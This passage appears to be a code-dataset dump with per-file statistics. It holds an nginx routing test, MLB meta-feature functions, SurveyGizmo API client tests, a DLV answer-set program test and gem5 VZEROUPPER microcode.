            filter_regexp, app, nginx_class, mocker, valid_user_header)

    def test_app_without_mesos_tasks(
            self, nginx_class, mocker, valid_user_header):
        """An app with an empty task list is rejected."""
        app = self._scheduler_alwaysthere_app()
        app["tasks"] = []

        filter_regexp = {
            "No task in state TASK_RUNNING for app '{}'".format(app["id"]):
                SearchCriteria(1, True),
        }

        self._assert_filter_regexp_for_invalid_app(
            filter_regexp, app, nginx_class, mocker, valid_user_header)

    def test_app_without_tasks_in_running_state(
            self, nginx_class, mocker, valid_user_header):
        """An app whose only task is not TASK_RUNNING is rejected."""
        app = self._scheduler_alwaysthere_app()
        app["tasks"] = [{"state": "TASK_FAILED"}]

        filter_regexp = {
            "No task in state TASK_RUNNING for app '{}'".format(app["id"]):
                SearchCriteria(1, True),
        }

        self._assert_filter_regexp_for_invalid_app(
            filter_regexp, app, nginx_class, mocker, valid_user_header)

    def test_app_without_task_host(
            self, nginx_class, mocker, valid_user_header):
        """An app whose running task carries no `host` is rejected."""
        app = self._scheduler_alwaysthere_app()
        app["tasks"][0].pop("host", None)

        filter_regexp = {
            "Cannot find host or ip for app '{}'".format(app["id"]):
                SearchCriteria(1, True),
        }

        self._assert_filter_regexp_for_invalid_app(
            filter_regexp, app, nginx_class, mocker, valid_user_header)

    def test_app_without_task_ports(
            self, nginx_class, mocker, valid_user_header):
        """An app whose running task carries no `ports` is rejected."""
        app = self._scheduler_alwaysthere_app()
        app["tasks"][0].pop("ports", None)

        filter_regexp = {
            "Cannot find ports for app '{}'".format(app["id"]):
                SearchCriteria(1, True),
        }

        self._assert_filter_regexp_for_invalid_app(
            filter_regexp, app, nginx_class, mocker, valid_user_header)

    def test_app_without_task_specified_port_idx(
            self, nginx_class, mocker, valid_user_header):
        """A DCOS_SERVICE_PORT_INDEX pointing past the task's port list
        is rejected."""
        app = self._scheduler_alwaysthere_app()
        app["labels"]["DCOS_SERVICE_PORT_INDEX"] = "5"

        filter_regexp = {
            "Cannot find port at Marathon port index '5' for app '{}'".format(
                app["id"]): SearchCriteria(1, True),
        }

        self._assert_filter_regexp_for_invalid_app(
            filter_regexp, app, nginx_class, mocker, valid_user_header)

    def _assert_filter_regexp_for_invalid_app(
            self,
            filter_regexp,
            app,
            nginx_class,
            mocker,
            auth_headers,
            ):
        """Helper method that will assert if provided regexp filter is found
        in nginx logs for given apps response from Marathon upstream endpoint.

        Arguments:
            filter_regexp (dict): Filter definition where key is the message
                looked up in logs and value is SearchCriteria definition
            app (dict): App that upstream endpoint should respond with
            nginx_class (Nginx): Nginx process fixture
            mocker (Mocker): Mocker fixture
            auth_headers (dict): Headers that should be passed to Nginx in the
                request
        """
        ar = nginx_class()

        mocker.send_command(endpoint_id='http://127.0.0.1:8080',
                            func_name='set_apps_response',
                            aux_data={"apps": [app]})
        # Remove all entries for mesos frameworks and mesos_dns so that
        # we test only the information in Marathon
        mocker.send_command(endpoint_id='http://127.0.0.2:5050',
                            func_name='set_frameworks_response',
                            aux_data=[])
        mocker.send_command(endpoint_id='http://127.0.0.1:8123',
                            func_name='set_srv_response',
                            aux_data=[])

        url = ar.make_url_from_path('/service/scheduler-alwaysthere/foo/bar/')
        with GuardedSubprocess(ar):
            # Register Line buffer filter:
            lbf = LineBufferFilter(filter_regexp,
                                   timeout=5,  # Just to give LBF enough time
                                   line_buffer=ar.stderr_line_buffer)

            # Trigger cache update by issuing request:
            resp = requests.get(url,
                                allow_redirects=False,
                                headers=auth_headers)
            assert resp.status_code == 404

            lbf.scan_log_buffer()

        assert lbf.extra_matches == {}

    def _scheduler_alwaysthere_app(self):
        """Returns a valid Marathon app with the '/scheduler-alwaysthere' id"""
        return copy.deepcopy(SCHEDULER_APP_ALWAYSTHERE)
| 41.35387 | 91 | 0.570902 | 5,905 | 52,354 | 4.782896 | 0.083489 | 0.029636 | 0.049393 | 0.036717 | 0.820522 | 0.798888 | 0.786708 | 0.765676 | 0.748256 | 0.732713 | 0 | 0.030916 | 0.345112 | 52,354 | 1,265 | 92 | 41.386561 | 0.792831 | 0.118195 | 0 | 0.732265 | 0 | 0 | 0.147273 | 0.022984 | 0 | 0 | 0 | 0 | 0.084668 | 1 | 0.048055 | false | 0 | 0.011442 | 0 | 0.064073 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
404203dff960899046bf0798466dac448b66d551 | 5,327 | py | Python | src/features/f800_meta.py | copyrosicky/MlbEngagementCompetition | eaeb3759946d5c5cde6c265698179db1a68dc935 | [
"MIT"
] | 7 | 2021-09-10T17:33:59.000Z | 2022-01-21T04:07:51.000Z | src/features/f800_meta.py | copyrosicky/MlbEngagementCompetition | eaeb3759946d5c5cde6c265698179db1a68dc935 | [
"MIT"
] | null | null | null | src/features/f800_meta.py | copyrosicky/MlbEngagementCompetition | eaeb3759946d5c5cde6c265698179db1a68dc935 | [
"MIT"
] | 4 | 2021-08-18T10:10:41.000Z | 2022-01-28T04:47:08.000Z | from typing import Dict
import pandas as pd
from src.streamdf import TimeSeriesStream
from src.features import *
from src.features.helper import diff_days
@feature([
    'events_oof_target1_min',
    'events_oof_target1_max',
    'events_oof_target1_mean',
    'events_oof_target2_min',
    'events_oof_target2_max',
    'events_oof_target2_mean',
])
def f800_meta(ctx: Context) -> Dict:
    """Latest per-player OOF meta-feature values (targets 1 and 2)."""
    if len(ctx.player.events_meta) == 0:
        return empty_feature(ctx.current_feature_name)

    meta = ctx.player.events_meta
    columns = (
        'events_oof_target1_min',
        'events_oof_target1_max',
        'events_oof_target1_mean',
        'events_oof_target2_min',
        'events_oof_target2_max',
        'events_oof_target2_mean',
    )
    return {column: meta.last_value(column) for column in columns}
@feature([
    'events_oof_target1_g_max',
    'events_oof_target1_g_mean',
    'events_oof_target2_g_max',
    'events_oof_target2_g_mean'
])
def f801_meta_global(ctx: Context) -> Dict:
    """Latest global (league-wide) OOF meta-feature values."""
    if len(ctx.daily_stats) == 0:
        return empty_feature(ctx.current_feature_name)

    meta = ctx.daily_stats
    columns = (
        'events_oof_target1_g_max',
        'events_oof_target1_g_mean',
        'events_oof_target2_g_max',
        'events_oof_target2_g_mean'
    )
    return {column: meta.last_value(column) for column in columns}
@feature([
    'events_oof_target1_t_max',
    'events_oof_target1_t_mean',
    'events_oof_target2_t_max',
    'events_oof_target2_t_mean',
    'events_oof_target3_t_max',
    'events_oof_target3_t_mean',
    'events_oof_target4_t_max',
    'events_oof_target4_t_mean',
])
def f802_meta_team(ctx: Context) -> Dict:
    """Latest team-level OOF meta-feature values (targets 1-4)."""
    team = ctx.team
    if team is None:
        return empty_feature(ctx.current_feature_name)

    meta = team.events_meta
    columns = (
        'events_oof_target1_t_max',
        'events_oof_target1_t_mean',
        'events_oof_target2_t_max',
        'events_oof_target2_t_mean',
        'events_oof_target3_t_max',
        'events_oof_target3_t_mean',
        'events_oof_target4_t_max',
        'events_oof_target4_t_mean',
    )
    return {column: meta.last_value(column) for column in columns}
@feature([
    'events_oof_target1_min',
    'events_oof_target1_max',
    'events_oof_target1_mean',
    'events_oof_target2_min',
    'events_oof_target2_max',
    'events_oof_target2_mean',
    'events_oof_target3_min',
    'events_oof_target3_max',
    'events_oof_target3_mean',
    'events_oof_target4_min',
    'events_oof_target4_max',
    'events_oof_target4_mean',
])
def f803_meta_asof_30d(ctx: Context) -> Dict:
    """Per-player OOF meta-feature values, used only when the player's
    most recent event is at most 30 days old."""
    meta = ctx.player.events_meta
    # Empty history, or a stale one (last event older than 30 days),
    # yields an empty feature.  Short-circuit keeps diff_days from
    # running on an empty stream, as in the original guard order.
    if len(meta) == 0 or diff_days(ctx.daily_data_date, meta) > 30:
        return empty_feature(ctx.current_feature_name)

    columns = (
        'events_oof_target1_min',
        'events_oof_target1_max',
        'events_oof_target1_mean',
        'events_oof_target2_min',
        'events_oof_target2_max',
        'events_oof_target2_mean',
        'events_oof_target3_min',
        'events_oof_target3_max',
        'events_oof_target3_mean',
        'events_oof_target4_min',
        'events_oof_target4_max',
        'events_oof_target4_mean',
    )
    return {column: meta.last_value(column) for column in columns}
@feature([
    'events_oof_target1_t_max',
    'events_oof_target1_t_mean',
    'events_oof_target2_t_max',
    'events_oof_target2_t_mean',
    'events_oof_target3_t_max',
    'events_oof_target3_t_mean',
    'events_oof_target4_t_max',
    'events_oof_target4_t_mean',
])
def f804_meta_team_exact(ctx: Context) -> Dict:
    """Team-level OOF meta-feature values, used only when a record
    exists for exactly the current daily-data date."""
    team = ctx.team
    if team is None:
        return empty_feature(ctx.current_feature_name)

    meta = team.events_meta
    # exact match: the latest record must be for today's date
    if len(meta) == 0 or meta.index[-1] != ctx.daily_data_date:
        return empty_feature(ctx.current_feature_name)

    columns = (
        'events_oof_target1_t_max',
        'events_oof_target1_t_mean',
        'events_oof_target2_t_max',
        'events_oof_target2_t_mean',
        'events_oof_target3_t_max',
        'events_oof_target3_t_mean',
        'events_oof_target4_t_max',
        'events_oof_target4_t_mean',
    )
    return {column: meta.last_value(column) for column in columns}
@feature([
    'events_oof_target1_g_max',
    'events_oof_target1_g_mean',
    'events_oof_target2_g_max',
    'events_oof_target2_g_mean',
    'events_oof_target3_g_max',
    'events_oof_target3_g_mean',
    'events_oof_target4_g_max',
    'events_oof_target4_g_mean',
])
def f805_meta_global_exact(ctx: Context) -> Dict:
    """Global OOF meta-feature values, used only when a record exists
    for exactly the current daily-data date."""
    meta = ctx.daily_stats
    # exact match: the latest record must be for today's date
    # (len check subsumes the original's separate empty-stats guard)
    if len(meta) == 0 or meta.index[-1] != ctx.daily_data_date:
        return empty_feature(ctx.current_feature_name)

    columns = (
        'events_oof_target1_g_max',
        'events_oof_target1_g_mean',
        'events_oof_target2_g_max',
        'events_oof_target2_g_mean',
        'events_oof_target3_g_max',
        'events_oof_target3_g_mean',
        'events_oof_target4_g_max',
        'events_oof_target4_g_mean',
    )
    return {column: meta.last_value(column) for column in columns}
| 27.458763 | 63 | 0.653276 | 716 | 5,327 | 4.305866 | 0.090782 | 0.26857 | 0.155693 | 0.067467 | 0.919559 | 0.916315 | 0.916315 | 0.916315 | 0.916315 | 0.916315 | 0 | 0.030669 | 0.253238 | 5,327 | 193 | 64 | 27.601036 | 0.744344 | 0.004318 | 0 | 0.852761 | 0 | 0 | 0.410489 | 0.410489 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03681 | false | 0 | 0.030675 | 0 | 0.159509 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
406c58a5fcca2bf9437e203c2081652887d027df | 13,205 | py | Python | tests/test_api.py | tozhovez/SurveyGizmo | ea36dde1167e7424a67d2f61ade0a0505e449a4b | [
"BSD-3-Clause"
] | null | null | null | tests/test_api.py | tozhovez/SurveyGizmo | ea36dde1167e7424a67d2f61ade0a0505e449a4b | [
"BSD-3-Clause"
] | null | null | null | tests/test_api.py | tozhovez/SurveyGizmo | ea36dde1167e7424a67d2f61ade0a0505e449a4b | [
"BSD-3-Clause"
] | null | null | null |
from unittest import TestCase
from surveygizmo import SurveyGizmo
# Shared client for all test cases below.  With ``prepare_url=True`` the
# resource methods return a ``(path, params)`` tuple instead of performing
# an HTTP request; clearing ``base_url`` keeps the returned paths relative
# so they can be compared against plain 'head/...' strings.
client = SurveyGizmo(api_token='token', api_token_secret='secret', prepare_url=True)
client.api.base_url = ''
class AccountTests(TestCase):
    """URL-building tests for the singleton `account` resource: only
    `get` is supported, every other verb raises NotImplementedError."""

    resource = client.api.account

    def test_list(self):
        self.assertRaises(NotImplementedError, self.resource.list)

    def test_get(self):
        endpoint, _ = self.resource.get()
        self.assertEqual(endpoint, 'head/account/')

    def test_create(self):
        self.assertRaises(NotImplementedError, self.resource.create)

    def test_update(self):
        self.assertRaises(NotImplementedError, self.resource.update)

    def test_copy(self):
        self.assertRaises(NotImplementedError, self.resource.copy)

    def test_delete(self):
        self.assertRaises(NotImplementedError, self.resource.delete)
class AccountTeamsTests(TestCase):
    """URL-building tests for the `accountteams` resource; `copy` is
    unsupported and raises NotImplementedError."""

    resource = client.api.accountteams

    def test_list(self):
        endpoint, _ = self.resource.list()
        self.assertEqual(endpoint, 'head/accountteams/')

    def test_get(self):
        endpoint, _ = self.resource.get(1)
        self.assertEqual(endpoint, 'head/accountteams/1')

    def test_create(self):
        endpoint, query = self.resource.create('team')
        self.assertEqual(endpoint, 'head/accountteams/')
        self.assertEqual(query['teamname'], 'team')

    def test_update(self):
        endpoint, _ = self.resource.update(1)
        self.assertEqual(endpoint, 'head/accountteams/1')

    def test_copy(self):
        self.assertRaises(NotImplementedError, self.resource.copy)

    def test_delete(self):
        endpoint, _ = self.resource.delete(1)
        self.assertEqual(endpoint, 'head/accountteams/1')
class AccountUserTests(TestCase):
    """URL-building tests for the `accountuser` resource; `copy` is
    unsupported and raises NotImplementedError."""

    resource = client.api.accountuser

    def test_list(self):
        endpoint, _ = self.resource.list()
        self.assertEqual(endpoint, 'head/accountuser/')

    def test_get(self):
        endpoint, _ = self.resource.get(1)
        self.assertEqual(endpoint, 'head/accountuser/1')

    def test_create(self):
        endpoint, query = self.resource.create('user@example.com')
        self.assertEqual(endpoint, 'head/accountuser/')
        self.assertEqual(query['email'], 'user@example.com')

    def test_update(self):
        endpoint, _ = self.resource.update(1)
        self.assertEqual(endpoint, 'head/accountuser/1')

    def test_copy(self):
        self.assertRaises(NotImplementedError, self.resource.copy)

    def test_delete(self):
        endpoint, _ = self.resource.delete(1)
        self.assertEqual(endpoint, 'head/accountuser/1')
class ContactTests(TestCase):
    """URL-building tests for the nested survey-campaign `contact`
    resource; `copy` is unsupported and raises NotImplementedError."""

    resource = client.api.contact

    def test_list(self):
        endpoint, _ = self.resource.list(1, 1)
        self.assertEqual(endpoint, 'head/survey/1/surveycampaign/1/contact/')

    def test_get(self):
        endpoint, _ = self.resource.get(1, 1, 1)
        self.assertEqual(endpoint, 'head/survey/1/surveycampaign/1/contact/1')

    def test_create(self):
        endpoint, query = self.resource.create(1, 1, 'user@example.com')
        self.assertEqual(endpoint, 'head/survey/1/surveycampaign/1/contact/')
        self.assertEqual(query['semailaddress'], 'user@example.com')

    def test_update(self):
        endpoint, _ = self.resource.update(1, 1, 1)
        self.assertEqual(endpoint, 'head/survey/1/surveycampaign/1/contact/1')

    def test_copy(self):
        self.assertRaises(NotImplementedError, self.resource.copy)

    def test_delete(self):
        endpoint, _ = self.resource.delete(1, 1, 1)
        self.assertEqual(endpoint, 'head/survey/1/surveycampaign/1/contact/1')
class ContactListTests(TestCase):
    """URL-building tests for the `contactlist` resource; `copy` and
    `delete` are unsupported and raise NotImplementedError."""

    resource = client.api.contactlist

    def test_list(self):
        endpoint, _ = self.resource.list()
        self.assertEqual(endpoint, 'head/contactlist/')

    def test_get(self):
        endpoint, _ = self.resource.get(1)
        self.assertEqual(endpoint, 'head/contactlist/1')

    def test_create(self):
        endpoint, query = self.resource.create('Contact List')
        self.assertEqual(endpoint, 'head/contactlist/')
        self.assertEqual(query['listname'], 'Contact List')

    def test_update(self):
        endpoint, query = self.resource.update(1, 'user@example.com')
        self.assertEqual(endpoint, 'head/contactlist/1')
        self.assertEqual(query['semailaddress'], 'user@example.com')

    def test_copy(self):
        self.assertRaises(NotImplementedError, self.resource.copy)

    def test_delete(self):
        self.assertRaises(NotImplementedError, self.resource.delete)
class EmailMessageTests(TestCase):
    """URL-building tests for the nested survey-campaign `emailmessage`
    resource; `copy` is unsupported and raises NotImplementedError."""

    resource = client.api.emailmessage

    def test_list(self):
        endpoint, _ = self.resource.list(1, 1)
        self.assertEqual(endpoint, 'head/survey/1/surveycampaign/1/emailmessage/')

    def test_get(self):
        endpoint, _ = self.resource.get(1, 1, 1)
        self.assertEqual(endpoint, 'head/survey/1/surveycampaign/1/emailmessage/1')

    def test_create(self):
        endpoint, _ = self.resource.create(1, 1)
        self.assertEqual(endpoint, 'head/survey/1/surveycampaign/1/emailmessage/')

    def test_update(self):
        endpoint, _ = self.resource.update(1, 1, 1)
        self.assertEqual(endpoint, 'head/survey/1/surveycampaign/1/emailmessage/1')

    def test_copy(self):
        self.assertRaises(NotImplementedError, self.resource.copy)

    def test_delete(self):
        endpoint, _ = self.resource.delete(1, 1, 1)
        self.assertEqual(endpoint, 'head/survey/1/surveycampaign/1/emailmessage/1')
class SurveyTests(TestCase):
    """URL-building tests for the `survey` resource; every verb,
    including `copy`, is supported."""

    resource = client.api.survey

    def test_list(self):
        endpoint, _ = self.resource.list()
        self.assertEqual(endpoint, 'head/survey/')

    def test_get(self):
        endpoint, _ = self.resource.get(1)
        self.assertEqual(endpoint, 'head/survey/1')

    def test_create(self):
        endpoint, query = self.resource.create('My Survey', 'poll')
        self.assertEqual(endpoint, 'head/survey/')
        self.assertEqual(query['title'], 'My Survey')
        self.assertEqual(query['type'], 'poll')

    def test_update(self):
        endpoint, _ = self.resource.update(1)
        self.assertEqual(endpoint, 'head/survey/1')

    def test_copy(self):
        endpoint, _ = self.resource.copy(1)
        self.assertEqual(endpoint, 'head/survey/1')

    def test_delete(self):
        endpoint, _ = self.resource.delete(1)
        self.assertEqual(endpoint, 'head/survey/1')
class SurveyCampaignTests(TestCase):
    """URL-building tests for the nested `surveycampaign` resource;
    every verb, including `copy`, is supported."""

    resource = client.api.surveycampaign

    def test_list(self):
        endpoint, _ = self.resource.list(1)
        self.assertEqual(endpoint, 'head/survey/1/surveycampaign/')

    def test_get(self):
        endpoint, _ = self.resource.get(1, 1)
        self.assertEqual(endpoint, 'head/survey/1/surveycampaign/1')

    def test_create(self):
        endpoint, query = self.resource.create(1, 'My Campaign', 'email')
        self.assertEqual(endpoint, 'head/survey/1/surveycampaign/')
        self.assertEqual(query['name'], 'My Campaign')
        self.assertEqual(query['type'], 'email')

    def test_update(self):
        endpoint, _ = self.resource.update(1, 1)
        self.assertEqual(endpoint, 'head/survey/1/surveycampaign/1')

    def test_copy(self):
        endpoint, _ = self.resource.copy(1, 1)
        self.assertEqual(endpoint, 'head/survey/1/surveycampaign/1')

    def test_delete(self):
        endpoint, _ = self.resource.delete(1, 1)
        self.assertEqual(endpoint, 'head/survey/1/surveycampaign/1')
class SurveyOptionTests(TestCase):
    """URL paths and params built by the surveyoption resource (nested under surveyquestion)."""
    resource = client.api.surveyoption

    def test_list(self):
        path, params = self.resource.list(1, 1)
        self.assertEqual(path, 'head/survey/1/surveyquestion/1/surveyoption/')

    def test_get(self):
        path, params = self.resource.get(1, 1, 1)
        self.assertEqual(path, 'head/survey/1/surveyquestion/1/surveyoption/1')

    def test_create(self):
        # create() takes survey id, question id, option title and value
        path, params = self.resource.create(1, 1, 'Option', 'Value')
        self.assertEqual(path, 'head/survey/1/surveyquestion/1/surveyoption/')
        self.assertEqual(params['title'], 'Option')
        self.assertEqual(params['value'], 'Value')

    def test_update(self):
        path, params = self.resource.update(1, 1, 1)
        self.assertEqual(path, 'head/survey/1/surveyquestion/1/surveyoption/1')

    def test_copy(self):
        # copy is not supported for this resource
        with self.assertRaises(NotImplementedError):
            self.resource.copy()

    def test_delete(self):
        path, params = self.resource.delete(1, 1, 1)
        self.assertEqual(path, 'head/survey/1/surveyquestion/1/surveyoption/1')
class SurveyPageTests(TestCase):
    """URL paths and params built by the surveypage resource (nested under survey)."""
    resource = client.api.surveypage

    def test_list(self):
        path, params = self.resource.list(1)
        self.assertEqual(path, 'head/survey/1/surveypage/')

    def test_get(self):
        path, params = self.resource.get(1, 1)
        self.assertEqual(path, 'head/survey/1/surveypage/1')

    def test_create(self):
        # create() takes the parent survey id and a page title
        path, params = self.resource.create(1, 'Page 1')
        self.assertEqual(path, 'head/survey/1/surveypage/')
        self.assertEqual(params['title'], 'Page 1')

    def test_update(self):
        path, params = self.resource.update(1, 1)
        self.assertEqual(path, 'head/survey/1/surveypage/1')

    def test_copy(self):
        # copy is not supported for this resource
        with self.assertRaises(NotImplementedError):
            self.resource.copy()

    def test_delete(self):
        path, params = self.resource.delete(1, 1)
        self.assertEqual(path, 'head/survey/1/surveypage/1')
class SurveyQuestionTests(TestCase):
    """URL paths built by the surveyquestion resource."""
    resource = client.api.surveyquestion

    def test_list(self):
        path, params = self.resource.list(1)
        self.assertEqual(path, 'head/survey/1/surveyquestion/')

    def test_get(self):
        path, params = self.resource.get(1, 1)
        self.assertEqual(path, 'head/survey/1/surveyquestion/1')

    def test_create(self):
        # NOTE(review): create() nests under surveypage while the other methods
        # nest directly under survey -- presumably intentional in the remote API; verify.
        path, params = self.resource.create(1, 1)
        self.assertEqual(path, 'head/survey/1/surveypage/1/surveyquestion/')

    def test_update(self):
        path, params = self.resource.update(1, 1)
        self.assertEqual(path, 'head/survey/1/surveyquestion/1')

    def test_copy(self):
        # copy is not supported for this resource
        with self.assertRaises(NotImplementedError):
            self.resource.copy()

    def test_delete(self):
        path, params = self.resource.delete(1, 1)
        self.assertEqual(path, 'head/survey/1/surveyquestion/1')
class SurveyReportTests(TestCase):
    """URL paths and params built by the surveyreport resource (nested under survey)."""
    resource = client.api.surveyreport

    def test_list(self):
        path, params = self.resource.list(1)
        self.assertEqual(path, 'head/survey/1/surveyreport/')

    def test_get(self):
        path, params = self.resource.get(1, 1)
        self.assertEqual(path, 'head/survey/1/surveyreport/1')

    def test_create(self):
        # create is not supported for this resource
        with self.assertRaises(NotImplementedError):
            self.resource.create()

    def test_update(self):
        # update and copy hit the same URL; the 'copy' param distinguishes them
        path, params = self.resource.update(1, 1)
        self.assertEqual(path, 'head/survey/1/surveyreport/1')
        self.assertEqual(params['copy'], 'false')

    def test_copy(self):
        path, params = self.resource.copy(1, 1)
        self.assertEqual(path, 'head/survey/1/surveyreport/1')
        self.assertEqual(params['copy'], 'true')

    def test_delete(self):
        path, params = self.resource.delete(1, 1)
        self.assertEqual(path, 'head/survey/1/surveyreport/1')
class SurveyResponseTests(TestCase):
    """URL paths built by the surveyresponse resource (nested under survey)."""
    resource = client.api.surveyresponse

    def test_list(self):
        path, params = self.resource.list(1)
        self.assertEqual(path, 'head/survey/1/surveyresponse/')

    def test_get(self):
        path, params = self.resource.get(1, 1)
        self.assertEqual(path, 'head/survey/1/surveyresponse/1')

    def test_create(self):
        path, params = self.resource.create(1)
        self.assertEqual(path, 'head/survey/1/surveyresponse/')

    def test_update(self):
        path, params = self.resource.update(1, 1)
        self.assertEqual(path, 'head/survey/1/surveyresponse/1')

    def test_copy(self):
        # copy is not supported for this resource
        with self.assertRaises(NotImplementedError):
            self.resource.copy()

    def test_delete(self):
        path, params = self.resource.delete(1, 1)
        self.assertEqual(path, 'head/survey/1/surveyresponse/1')
class SurveyStatisticTests(TestCase):
    """The surveystatistic resource is list-only; everything else must raise."""
    resource = client.api.surveystatistic

    def test_list(self):
        path, params = self.resource.list(1)
        self.assertEqual(path, 'head/survey/1/surveystatistic/')

    def test_get(self):
        with self.assertRaises(NotImplementedError):
            self.resource.get()

    def test_create(self):
        with self.assertRaises(NotImplementedError):
            self.resource.create()

    def test_update(self):
        with self.assertRaises(NotImplementedError):
            self.resource.update()

    def test_copy(self):
        with self.assertRaises(NotImplementedError):
            self.resource.copy()

    def test_delete(self):
        with self.assertRaises(NotImplementedError):
            self.resource.delete()
| 31.973366 | 84 | 0.653768 | 1,587 | 13,205 | 5.383743 | 0.049149 | 0.06882 | 0.10323 | 0.132725 | 0.835908 | 0.823736 | 0.815309 | 0.789209 | 0.772589 | 0.735487 | 0 | 0.018693 | 0.214086 | 13,205 | 412 | 85 | 32.050971 | 0.804587 | 0 | 0 | 0.788591 | 0 | 0 | 0.158664 | 0.108149 | 0 | 0 | 0 | 0 | 0.328859 | 1 | 0.281879 | false | 0 | 0.006711 | 0 | 0.38255 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
407125ca0951f747db634a39b5081a6dd185a409 | 1,805 | py | Python | tests/parser/answer_sets_interpreter.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/answer_sets_interpreter.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/answer_sets_interpreter.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | input = """
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% dlv-Interpreter for preferred answer sets of propositional programs.
%
% Store rules
%
% r: A <- B1,...,Bm, not C1,..., not Cn
%
% by facts:
%
% rule(r). head(A,r). bpl(B1,r). ... bpl(Bm,r). nbl(C1,r). ... nbl(Cn,r).
%
% classical negation must be emulated, state facts opp(L,L') for
% opposite classical literals
%
% Specify preference r < r' through fact pr(r,r').
%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% Apply rules of the program:
in_AS(X) :- head(X,Y), not pos_body_false(Y), not neg_body_false(Y).
% pbl - positive body literal; nbl - negative body literal
pos_body_false(Y) :- pbl(X,Y), not in_AS(X).
neg_body_false(Y) :- nbl(X,Y), in_AS(X).
% Eliminate opposite literals (explicitly specified).
:- opp(X,Y), in_AS(X), in_AS(Y).
"""
output = """
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% dlv-Interpreter for preferred answer sets of propositional programs.
%
% Store rules
%
% r: A <- B1,...,Bm, not C1,..., not Cn
%
% by facts:
%
% rule(r). head(A,r). bpl(B1,r). ... bpl(Bm,r). nbl(C1,r). ... nbl(Cn,r).
%
% classical negation must be emulated, state facts opp(L,L') for
% opposite classical literals
%
% Specify preference r < r' through fact pr(r,r').
%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% Apply rules of the program:
in_AS(X) :- head(X,Y), not pos_body_false(Y), not neg_body_false(Y).
% pbl - positive body literal; nbl - negative body literal
pos_body_false(Y) :- pbl(X,Y), not in_AS(X).
neg_body_false(Y) :- nbl(X,Y), in_AS(X).
% Eliminate opposite literals (explicitly specified).
:- opp(X,Y), in_AS(X), in_AS(Y).
"""
| 25.422535 | 74 | 0.52133 | 252 | 1,805 | 3.630952 | 0.234127 | 0.043716 | 0.043716 | 0.056831 | 0.987978 | 0.987978 | 0.987978 | 0.987978 | 0.987978 | 0.987978 | 0 | 0.005316 | 0.166205 | 1,805 | 70 | 75 | 25.785714 | 0.602658 | 0 | 0 | 0.666667 | 0 | 0.074074 | 0.982825 | 0.158449 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
40c672435d29a97d7880b2793382d6bc7faec09a | 2,183 | py | Python | src/arch/x86/isa/insts/simd512/floating_point/data_transfer/vzeroupper.py | jyhuang91/gem5-avx | f988da46080f8db49beb39e20af437219f3aa4cb | [
"BSD-3-Clause"
] | 2 | 2021-01-15T17:32:18.000Z | 2021-12-21T02:53:58.000Z | src/arch/x86/isa/insts/simd512/floating_point/data_transfer/vzeroupper.py | jyhuang91/gem5-avx | f988da46080f8db49beb39e20af437219f3aa4cb | [
"BSD-3-Clause"
] | 3 | 2021-03-26T20:33:59.000Z | 2022-01-24T22:54:03.000Z | src/arch/x86/isa/insts/simd512/floating_point/data_transfer/vzeroupper.py | jyhuang91/gem5-avx | f988da46080f8db49beb39e20af437219f3aa4cb | [
"BSD-3-Clause"
] | 3 | 2021-03-27T16:36:19.000Z | 2022-03-28T18:32:57.000Z | microcode = '''
def macroop VZEROUPPER {
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(0, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(1, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(2, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(3, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(4, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(5, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(6, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(7, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(8, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(9, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(10, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(11, 2))", destVL=16
